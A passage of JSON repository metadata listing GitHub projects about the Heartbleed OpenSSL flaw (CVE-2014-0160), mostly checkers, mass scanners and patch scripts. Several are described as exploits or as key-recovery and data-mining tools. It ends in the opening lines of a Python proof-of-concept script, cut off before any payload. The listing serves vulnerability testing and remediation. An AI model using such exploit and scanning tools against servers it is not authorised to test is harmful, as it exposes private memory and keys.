[ { "id": 18537678, "name": "Heartbleed", "full_name": "FiloSottile\/Heartbleed", "owner": { "login": "FiloSottile", "id": 1225294, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1225294?v=4", "html_url": "https:\/\/github.com\/FiloSottile", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/FiloSottile\/Heartbleed", "description": "A checker (site and tool) for CVE-2014-0160", "fork": false, "created_at": "2014-04-07T23:03:09Z", "updated_at": "2025-01-06T17:00:55Z", "pushed_at": "2021-02-24T09:17:24Z", "stargazers_count": 2304, "watchers_count": 2304, "has_discussions": false, "forks_count": 461, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 461, "watchers": 2304, "score": 0, "subscribers_count": 117 }, { "id": 18545207, "name": "heartbleeder", "full_name": "titanous\/heartbleeder", "owner": { "login": "titanous", "id": 13026, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13026?v=4", "html_url": "https:\/\/github.com\/titanous", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/titanous\/heartbleeder", "description": "OpenSSL CVE-2014-0160 Heartbleed vulnerability test", "fork": false, "created_at": "2014-04-08T04:25:23Z", "updated_at": "2025-01-03T16:50:21Z", "pushed_at": "2014-05-27T22:32:26Z", "stargazers_count": 451, "watchers_count": 451, "has_discussions": false, "forks_count": 86, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 86, "watchers": 451, "score": 0, "subscribers_count": 30 }, { "id": 18551813, "name": "bleed", "full_name": "DominikTo\/bleed", "owner": { "login": "DominikTo", "id": 1384635, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1384635?v=4", "html_url": "https:\/\/github.com\/DominikTo", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/DominikTo\/bleed", "description": "bleed is a tool to test servers for the 'Heartbleed' vulnerability (CVE-2014-0160).", "fork": false, "created_at": "2014-04-08T09:03:01Z", "updated_at": "2018-10-05T15:36:14Z", "pushed_at": "2014-04-17T13:29:34Z", "stargazers_count": 7, "watchers_count": 7, "has_discussions": false, "forks_count": 0, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 0, "watchers": 7, "score": 0, "subscribers_count": 3 }, { "id": 18551976, "name": "heartthreader", "full_name": "cyphar\/heartthreader", "owner": { "login": "cyphar", "id": 2888411, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2888411?v=4", "html_url": "https:\/\/github.com\/cyphar", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cyphar\/heartthreader", "description": "Mass, multithreaded testing for servers against Heartbleed (CVE-2014-0160).", "fork": false, "created_at": "2014-04-08T09:08:52Z", "updated_at": "2023-01-28T21:18:39Z", "pushed_at": "2014-05-29T11:38:13Z", "stargazers_count": 2, "watchers_count": 2, "has_discussions": false, "forks_count": 2, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 2, "watchers": 2, "score": 0, "subscribers_count": 3 }, { "id": 18552299, "name": "patch-openssl-CVE-2014-0160", "full_name": "jdauphant\/patch-openssl-CVE-2014-0160", "owner": { "login": "jdauphant", "id": 1238254, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1238254?v=4", "html_url": "https:\/\/github.com\/jdauphant", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/jdauphant\/patch-openssl-CVE-2014-0160", "description": "Patch openssl #heartbleed with ansible ", "fork": false, "created_at": "2014-04-08T09:19:49Z", "updated_at": "2023-12-24T08:31:41Z", "pushed_at": "2014-12-02T12:20:51Z", "stargazers_count": 19, "watchers_count": 19, "has_discussions": false, "forks_count": 8, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 8, "watchers": 19, "score": 0, "subscribers_count": 1 }, { "id": 18553786, "name": "heartbleed-masstest", "full_name": "musalbas\/heartbleed-masstest", "owner": { "login": "musalbas", "id": 5038597, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5038597?v=4", "html_url": "https:\/\/github.com\/musalbas", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/musalbas\/heartbleed-masstest", "description": "Multi-threaded tool for scanning many hosts for CVE-2014-0160.", "fork": false, "created_at": "2014-04-08T10:10:43Z", "updated_at": "2025-01-03T16:50:42Z", "pushed_at": "2015-07-02T14:47:31Z", "stargazers_count": 573, "watchers_count": 573, "has_discussions": false, "forks_count": 212, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 212, "watchers": 573, "score": 0, "subscribers_count": 57 }, { "id": 18561166, "name": "CVE-2014-0160-Scanner", "full_name": "obayesshelton\/CVE-2014-0160-Scanner", "owner": { "login": "obayesshelton", "id": 628720, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/628720?v=4", "html_url": "https:\/\/github.com\/obayesshelton", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/obayesshelton\/CVE-2014-0160-Scanner", "description": null, "fork": false, "created_at": "2014-04-08T14:22:36Z", "updated_at": "2014-04-10T14:04:12Z", "pushed_at": "2014-04-10T14:04:12Z", "stargazers_count": 0, "watchers_count": 0, "has_discussions": false, "forks_count": 0, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 0, "watchers": 0, "score": 0, "subscribers_count": 3 }, { "id": 18566360, "name": "pacemaker", "full_name": "Lekensteyn\/pacemaker", "owner": { "login": "Lekensteyn", "id": 164530, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/164530?v=4", "html_url": "https:\/\/github.com\/Lekensteyn", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Lekensteyn\/pacemaker", "description": "Heartbleed (CVE-2014-0160) client exploit", "fork": false, "created_at": "2014-04-08T16:41:51Z", "updated_at": "2025-01-14T11:05:31Z", "pushed_at": "2016-01-22T00:42:35Z", "stargazers_count": 321, "watchers_count": 321, "has_discussions": false, "forks_count": 78, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 78, "watchers": 321, "score": 0, "subscribers_count": 32 }, { "id": 18574769, "name": "openmagic", "full_name": "isgroup\/openmagic", "owner": { "login": "isgroup", "id": 8706498, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8706498?v=4", "html_url": "https:\/\/github.com\/isgroup", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/isgroup\/openmagic", "description": "OpenSSL TLS heartbeat read overrun (CVE-2014-0160)", "fork": false, "created_at": "2014-04-08T20:58:26Z", "updated_at": "2024-03-28T09:37:17Z", "pushed_at": "2014-04-11T02:40:46Z", "stargazers_count": 39, "watchers_count": 39, "has_discussions": false, "forks_count": 8, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 8, "watchers": 39, "score": 0, "subscribers_count": 3 }, { "id": 18577198, "name": "CVE-2014-0160", "full_name": "fb1h2s\/CVE-2014-0160", "owner": { "login": "fb1h2s", "id": 2658510, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2658510?v=4", "html_url": "https:\/\/github.com\/fb1h2s", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/fb1h2s\/CVE-2014-0160", "description": "openssl Heart Bleed Exploit: CVE-2014-0160 Mass Security Auditor", "fork": false, "created_at": "2014-04-08T22:29:55Z", "updated_at": "2014-04-08T22:29:55Z", "pushed_at": "2014-04-08T22:29:55Z", "stargazers_count": 0, "watchers_count": 0, "has_discussions": false, "forks_count": 0, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 0, "watchers": 0, "score": 0, "subscribers_count": 1 }, { "id": 18578735, "name": "ssl-heartbleed.nse", "full_name": "takeshixx\/ssl-heartbleed.nse", "owner": { "login": "takeshixx", "id": 5837896, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5837896?v=4", "html_url": "https:\/\/github.com\/takeshixx", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/takeshixx\/ssl-heartbleed.nse", "description": "Nmap NSE script that discovers\/exploits Heartbleed\/CVE-2014-0160", "fork": false, "created_at": "2014-04-08T23:39:17Z", "updated_at": "2023-01-28T12:15:52Z", "pushed_at": "2014-04-13T11:10:34Z", "stargazers_count": 0, "watchers_count": 0, "has_discussions": false, "forks_count": 0, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 0, "watchers": 0, "score": 0, "subscribers_count": 3 }, { "id": 18580081, "name": "heartbleedchecker-chrome", "full_name": "roganartu\/heartbleedchecker-chrome", "owner": { "login": "roganartu", "id": 1133705, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1133705?v=4", "html_url": "https:\/\/github.com\/roganartu", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/roganartu\/heartbleedchecker-chrome", "description": "Chrome extension that automatically checks visited sites for vulnerability to OpenSSL CVE-2014-0160", "fork": false, "created_at": "2014-04-09T00:41:04Z", "updated_at": "2014-04-09T01:05:21Z", "pushed_at": "2014-04-09T01:05:20Z", "stargazers_count": 0, "watchers_count": 0, "has_discussions": false, "forks_count": 0, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 0, "watchers": 0, "score": 0, "subscribers_count": 2 }, { "id": 18586339, "name": "heartbleed", "full_name": "zouguangxian\/heartbleed", "owner": { "login": "zouguangxian", "id": 863281, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/863281?v=4", "html_url": "https:\/\/github.com\/zouguangxian", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/zouguangxian\/heartbleed", "description": "Checks for vulnerabilities: CVE-2014-0160 ", "fork": false, "created_at": "2014-04-09T05:29:36Z", "updated_at": "2024-06-18T13:57:13Z", "pushed_at": "2014-04-10T01:49:59Z", "stargazers_count": 2, "watchers_count": 2, "has_discussions": false, "forks_count": 2, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 2, "watchers": 2, "score": 0, "subscribers_count": 1 }, { "id": 18603489, "name": "heartbleed-poc", "full_name": "sensepost\/heartbleed-poc", "owner": { "login": "sensepost", "id": 1193973, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1193973?v=4", "html_url": "https:\/\/github.com\/sensepost", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/sensepost\/heartbleed-poc", "description": "Test for SSL heartbeat vulnerability (CVE-2014-0160)", "fork": false, "created_at": "2014-04-09T15:59:14Z", "updated_at": "2024-09-07T09:56:34Z", "pushed_at": "2014-07-10T21:17:22Z", "stargazers_count": 159, "watchers_count": 159, "has_discussions": false, "forks_count": 83, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 83, "watchers": 159, "score": 0, "subscribers_count": 7 }, { "id": 18613807, "name": "heartbleed-extention", "full_name": "proactiveRISK\/heartbleed-extention", "owner": { "login": "proactiveRISK", "id": 7243071, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7243071?v=4", "html_url": "https:\/\/github.com\/proactiveRISK", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/proactiveRISK\/heartbleed-extention", "description": "A firefox extension and checker for CVE-2014-0160", "fork": false, "created_at": "2014-04-09T21:20:56Z", "updated_at": "2015-03-07T23:34:52Z", "pushed_at": "2014-04-11T15:34:20Z", "stargazers_count": 1, "watchers_count": 1, "has_discussions": false, "forks_count": 1, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 1, "watchers": 1, "score": 0, "subscribers_count": 2 }, { "id": 18621109, "name": "coronary", "full_name": "amerine\/coronary", "owner": { "login": "amerine", "id": 1016, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1016?v=4", "html_url": "https:\/\/github.com\/amerine", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/amerine\/coronary", "description": "Test CIDR blocks for CVE-2014-0160\/Heartbleed", "fork": false, "created_at": "2014-04-10T02:28:05Z", "updated_at": "2023-11-20T04:54:55Z", "pushed_at": "2014-04-10T02:41:44Z", "stargazers_count": 2, "watchers_count": 2, "has_discussions": false, "forks_count": 1, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 1, "watchers": 2, "score": 0, "subscribers_count": 3 }, { "id": 18621604, "name": "CVE-2014-0160", "full_name": "0x90\/CVE-2014-0160", "owner": { "login": "0x90", "id": 806042, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/806042?v=4", "html_url": "https:\/\/github.com\/0x90", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0x90\/CVE-2014-0160", "description": "Heartbleed variants", "fork": false, "created_at": "2014-04-10T02:47:43Z", "updated_at": "2019-05-15T09:18:49Z", "pushed_at": "2014-05-09T15:51:53Z", "stargazers_count": 6, "watchers_count": 6, "has_discussions": false, "forks_count": 13, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 13, "watchers": 6, "score": 0, "subscribers_count": 8 }, { "id": 18623918, "name": "CVE-2014-0160", "full_name": "ice-security88\/CVE-2014-0160", "owner": { "login": "ice-security88", "id": 7246782, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7246782?v=4", "html_url": "https:\/\/github.com\/ice-security88", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ice-security88\/CVE-2014-0160", "description": null, "fork": false, "created_at": "2014-04-10T04:27:10Z", "updated_at": "2014-04-10T04:27:10Z", "pushed_at": "2014-04-10T04:27:10Z", "stargazers_count": 0, "watchers_count": 0, "has_discussions": false, "forks_count": 0, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 0, "watchers": 0, "score": 0, "subscribers_count": 2 }, { "id": 18634299, "name": "HeartBleed-Vulnerability-Checker", "full_name": "waqasjamal-zz\/HeartBleed-Vulnerability-Checker", "owner": { "login": "waqasjamal-zz", "id": 2502430, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2502430?v=4", "html_url": "https:\/\/github.com\/waqasjamal-zz", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/waqasjamal-zz\/HeartBleed-Vulnerability-Checker", "description": "This repo contains a script to automatically test sites for vulnerability to the Heartbleed Bug (CVE-2014-0160) based on the input file for the urls.", "fork": false, "created_at": "2014-04-10T11:42:33Z", "updated_at": "2014-04-11T11:41:14Z", "pushed_at": "2014-04-11T11:41:17Z", "stargazers_count": 1, "watchers_count": 1, "has_discussions": false, "forks_count": 0, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 0, "watchers": 1, "score": 0, "subscribers_count": 1 }, { "id": 18644790, "name": "knockbleed", "full_name": "siddolo\/knockbleed", "owner": { "login": "siddolo", "id": 2439981, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2439981?v=4", "html_url": "https:\/\/github.com\/siddolo", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/siddolo\/knockbleed", "description": "CVE-2014-0160 mass test against subdomains", "fork": false, "created_at": "2014-04-10T17:12:53Z", "updated_at": "2014-04-10T17:48:36Z", "pushed_at": "2014-04-10T17:48:39Z", "stargazers_count": 0, "watchers_count": 0, "has_discussions": false, "forks_count": 0, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 0, "watchers": 0, "score": 0, "subscribers_count": 3 }, { "id": 18649488, "name": "openssl-heartbleed-fix", "full_name": "sammyfung\/openssl-heartbleed-fix", "owner": { "login": "sammyfung", "id": 50470, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50470?v=4", "html_url": "https:\/\/github.com\/sammyfung", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/sammyfung\/openssl-heartbleed-fix", "description": "OpenSSL Heartbleed (CVE-2014-0160) Fix script", "fork": false, "created_at": "2014-04-10T19:47:42Z", "updated_at": "2014-06-11T14:34:33Z", "pushed_at": "2014-04-10T20:11:58Z", "stargazers_count": 1, "watchers_count": 1, "has_discussions": false, "forks_count": 0, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 0, "watchers": 1, "score": 0, "subscribers_count": 2 }, { "id": 18676804, "name": "heartbleed-test", "full_name": "a0726h77\/heartbleed-test", "owner": { "login": "a0726h77", "id": 127018, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127018?v=4", "html_url": "https:\/\/github.com\/a0726h77", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/a0726h77\/heartbleed-test", "description": "CVE-2014-0160 scanner", "fork": false, "created_at": "2014-04-11T14:24:54Z", "updated_at": "2014-04-12T13:29:50Z", "pushed_at": "2014-04-12T13:29:53Z", "stargazers_count": 0, "watchers_count": 0, "has_discussions": false, "forks_count": 0, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 0, "watchers": 0, "score": 0, "subscribers_count": 2 }, { "id": 18685640, "name": "aws-suture", "full_name": "pblittle\/aws-suture", "owner": { "login": "pblittle", "id": 21940, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21940?v=4", "html_url": "https:\/\/github.com\/pblittle", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/pblittle\/aws-suture", "description": "OpenSSL Heartbleed (CVE-2014-0160) vulnerability scanner.", "fork": false, "created_at": "2014-04-11T19:12:11Z", "updated_at": "2024-03-22T13:15:47Z", "pushed_at": "2014-09-25T16:00:36Z", "stargazers_count": 2, "watchers_count": 2, "has_discussions": false, "forks_count": 1, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [ "heartbleed", "openssl", "vulnerability-detection" ], "visibility": "public", "forks": 1, "watchers": 2, "score": 0, "subscribers_count": 2 }, { "id": 18705580, "name": "heartbleed-dtls", "full_name": "hreese\/heartbleed-dtls", "owner": { "login": "hreese", "id": 892400, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/892400?v=4", "html_url": "https:\/\/github.com\/hreese", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/hreese\/heartbleed-dtls", "description": "POC for CVE-2014-0160 (Heartbleed) for DTLS", "fork": false, "created_at": "2014-04-12T14:13:36Z", "updated_at": "2022-11-28T16:18:03Z", "pushed_at": "2016-03-26T12:21:03Z", "stargazers_count": 5, "watchers_count": 5, "has_discussions": false, "forks_count": 0, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 0, "watchers": 5, "score": 0, "subscribers_count": 3 }, { "id": 18714630, "name": "bleeding_onions", "full_name": "wwwiretap\/bleeding_onions", "owner": { "login": "wwwiretap", "id": 210109, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/210109?v=4", "html_url": "https:\/\/github.com\/wwwiretap", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/wwwiretap\/bleeding_onions", "description": "Script to find Exit and Guard nodes in the Tor Network, that are still suffering from CVE-2014-0160", "fork": false, "created_at": "2014-04-12T21:04:55Z", "updated_at": "2014-09-09T17:32:17Z", "pushed_at": "2014-04-13T14:57:20Z", "stargazers_count": 6, "watchers_count": 6, "has_discussions": false, "forks_count": 0, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 0, "watchers": 6, "score": 0, "subscribers_count": 3 }, { "id": 18722665, "name": "heatbleeding", "full_name": "idkqh7\/heatbleeding", "owner": { "login": "idkqh7", "id": 2221840, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2221840?v=4", "html_url": "https:\/\/github.com\/idkqh7", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/idkqh7\/heatbleeding", "description": "Test script for test 1Password database for SSL Hea(r)t Bleeding (CVE-2014-0160)", "fork": false, "created_at": "2014-04-13T05:52:43Z", "updated_at": "2018-03-04T07:22:19Z", "pushed_at": "2014-04-09T16:36:52Z", "stargazers_count": 0, "watchers_count": 0, "has_discussions": false, "forks_count": 0, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 0, "watchers": 0, "score": 0, "subscribers_count": 2 }, { "id": 18728436, "name": "ssl-heartbleed.nse", "full_name": "GeeksXtreme\/ssl-heartbleed.nse", "owner": { "login": "GeeksXtreme", "id": 5917335, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5917335?v=4", "html_url": "https:\/\/github.com\/GeeksXtreme", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/GeeksXtreme\/ssl-heartbleed.nse", "description": "Nmap NSE script that discovers\/exploits Heartbleed\/CVE-2014-0160.", "fork": false, "created_at": "2014-04-13T12:14:29Z", "updated_at": "2024-08-12T19:13:40Z", "pushed_at": "2014-04-13T11:10:34Z", "stargazers_count": 0, "watchers_count": 0, "has_discussions": false, "forks_count": 4, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 4, "watchers": 0, "score": 0, "subscribers_count": 2 }, { "id": 18737537, "name": "heartbleed", "full_name": "xlucas\/heartbleed", "owner": { "login": "xlucas", "id": 2470398, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2470398?v=4", "html_url": "https:\/\/github.com\/xlucas", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/xlucas\/heartbleed", "description": "A research tool designed to check for OpenSSL CVE-2014-0160 vulnerability", "fork": false, "created_at": "2014-04-13T19:18:32Z", "updated_at": "2023-01-28T19:55:06Z", "pushed_at": "2015-05-02T08:25:20Z", "stargazers_count": 1, "watchers_count": 1, "has_discussions": false, "forks_count": 0, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 0, "watchers": 1, "score": 0, "subscribers_count": 2 }, { "id": 18794584, "name": "-Heartbleed-", "full_name": "indiw0rm\/-Heartbleed-", "owner": { "login": "indiw0rm", "id": 7300510, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7300510?v=4", "html_url": "https:\/\/github.com\/indiw0rm", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/indiw0rm\/-Heartbleed-", "description": "A checker (site and tool) for CVE-2014-0160: ", "fork": false, "created_at": "2014-04-15T09:30:40Z", "updated_at": "2014-04-15T09:30:40Z", "pushed_at": "2014-04-15T09:30:40Z", "stargazers_count": 0, "watchers_count": 0, "has_discussions": false, "forks_count": 0, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 0, "watchers": 0, "score": 0, "subscribers_count": 1 }, { "id": 18802435, "name": "heartbleed-tools", "full_name": "einaros\/heartbleed-tools", "owner": { "login": "einaros", "id": 394360, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/394360?v=4", "html_url": "https:\/\/github.com\/einaros", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/einaros\/heartbleed-tools", "description": "OpenSSL Heartbleed (CVE-2014-0160) vulnerability scanner, data miner and RSA key-restore tools.", "fork": false, "created_at": "2014-04-15T14:09:54Z", "updated_at": "2024-01-13T15:14:58Z", "pushed_at": "2014-06-18T11:54:32Z", "stargazers_count": 98, "watchers_count": 98, "has_discussions": false, "forks_count": 23, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 23, "watchers": 98, "score": 0, "subscribers_count": 5 }, { "id": 18818122, "name": "Heartbleed", "full_name": "mozilla-services\/Heartbleed", "owner": { "login": "mozilla-services", "id": 1066228, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1066228?v=4", "html_url": "https:\/\/github.com\/mozilla-services", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/mozilla-services\/Heartbleed", "description": "A checker (site and tool) for CVE-2014-0160", "fork": false, "created_at": "2014-04-15T22:22:18Z", "updated_at": "2023-01-28T18:42:45Z", "pushed_at": "2019-03-27T19:51:32Z", "stargazers_count": 3, "watchers_count": 3, "has_discussions": false, "forks_count": 1, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 1, "watchers": 3, "score": 0, "subscribers_count": 5 }, { "id": 18935164, "name": "heartbleed.js", "full_name": "yryz\/heartbleed.js", "owner": { "login": "yryz", "id": 1646732, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1646732?v=4", "html_url": "https:\/\/github.com\/yryz", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/yryz\/heartbleed.js", "description": "openssl Heartbleed bug(CVE-2014-0160) check for Node.js ", "fork": false, "created_at": "2014-04-19T06:20:44Z", "updated_at": "2022-10-09T06:01:17Z", "pushed_at": "2015-04-30T09:25:33Z", "stargazers_count": 4, "watchers_count": 4, "has_discussions": false, "forks_count": 1, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [ "heartbleed", "javascript", "nodejs", "openssl" ], "visibility": "public", "forks": 1, "watchers": 4, "score": 0, "subscribers_count": 2 }, { "id": 19339521, "name": "MaltegoHeartbleed", "full_name": "DisK0nn3cT\/MaltegoHeartbleed", "owner": { "login": "DisK0nn3cT", "id": 727064, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/727064?v=4", "html_url": "https:\/\/github.com\/DisK0nn3cT", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/DisK0nn3cT\/MaltegoHeartbleed", "description": "Maltego transform to detect the OpenSSL Heartbleed vulnerability (CVE-2014-0160)", "fork": false, "created_at": "2014-05-01T08:28:45Z", "updated_at": "2024-11-22T21:14:20Z", "pushed_at": "2014-05-01T08:47:16Z", "stargazers_count": 18, "watchers_count": 18, "has_discussions": false, "forks_count": 7, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 7, "watchers": 18, "score": 0, "subscribers_count": 6 }, { "id": 19408970, "name": "HeartLeak", "full_name": "OffensivePython\/HeartLeak", "owner": { "login": "OffensivePython", "id": 6576532, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6576532?v=4", "html_url": "https:\/\/github.com\/OffensivePython", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/OffensivePython\/HeartLeak", "description": "CVE-2014-0160 (Heartbeat Buffer over-read bug)", "fork": false, "created_at": "2014-05-03T18:08:27Z", "updated_at": "2024-08-12T19:13:48Z", "pushed_at": "2014-05-03T18:14:49Z", "stargazers_count": 16, "watchers_count": 16, "has_discussions": false, "forks_count": 10, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 10, "watchers": 16, "score": 0, "subscribers_count": 4 }, { "id": 25109038, "name": "ssl_scanner", "full_name": "vortextube\/ssl_scanner", "owner": { "login": "vortextube", "id": 7092728, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7092728?v=4", "html_url": "https:\/\/github.com\/vortextube", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/vortextube\/ssl_scanner", "description": "Heartbleed (CVE-2014-0160) SSLv3 Scanner", "fork": false, "created_at": "2014-10-12T05:13:06Z", "updated_at": "2017-01-18T17:52:53Z", "pushed_at": "2014-10-12T05:22:07Z", "stargazers_count": 1, "watchers_count": 1, "has_discussions": false, "forks_count": 1, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 1, "watchers": 1, "score": 0, "subscribers_count": 2 }, { "id": 31863201, "name": "heartbleed-PoC", "full_name": "mpgn\/heartbleed-PoC", "owner": { "login": "mpgn", "id": 5891788, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5891788?v=4", "html_url": "https:\/\/github.com\/mpgn", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/mpgn\/heartbleed-PoC", "description": ":broken_heart: Hearbleed exploit to retrieve sensitive information CVE-2014-0160 :broken_heart:", "fork": false, "created_at": "2015-03-08T19:54:33Z", "updated_at": "2025-01-14T11:03:40Z", "pushed_at": "2021-02-20T19:41:03Z", "stargazers_count": 82, "watchers_count": 82, "has_discussions": false, "forks_count": 42, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 42, "watchers": 82, "score": 0, "subscribers_count": 6 }, { "id": 33456758, "name": "heartbleed.py", "full_name": "xanas\/heartbleed.py", "owner": { "login": "xanas", "id": 11810462, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11810462?v=4", "html_url": "https:\/\/github.com\/xanas", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/xanas\/heartbleed.py", "description": "#!\/usr\/bin\/python # Modified by Travis Lee # -changed output to display text only instead of hexdump and made it easier to read # -added option to specify number of times to connect to server (to get more data) # -added option to specify TLS version # -added option to send STARTTLS command for use with SMTP\/POP\/IMAP\/FTP\/etc... # -added option to specify an input file of multiple hosts, line delimited, with or without a port specified (host:port) # -added option to have verbose output # -added capability to automatically check if STARTTLS\/STLS\/AUTH TLS is supported when smtp\/pop\/imap\/ftp ports are entered and automatically send appropriate command # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) # The author disclaims copyright to this source code. import sys import struct import socket import time import select import re from optparse import OptionParser options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') options.add_option('-n', '--num', type='int', default=1, help='Number of times to connect\/loop (default: 1)') options.add_option('-t', '--tls', type='int', default=1, help='Specify TLS version: 0 = 1.0, 1 = 1.1, 2 = 1.2 (default: 1)') options.add_option('-s', '--starttls', action=\"store_true\", dest=\"starttls\", help='Issue STARTTLS command for 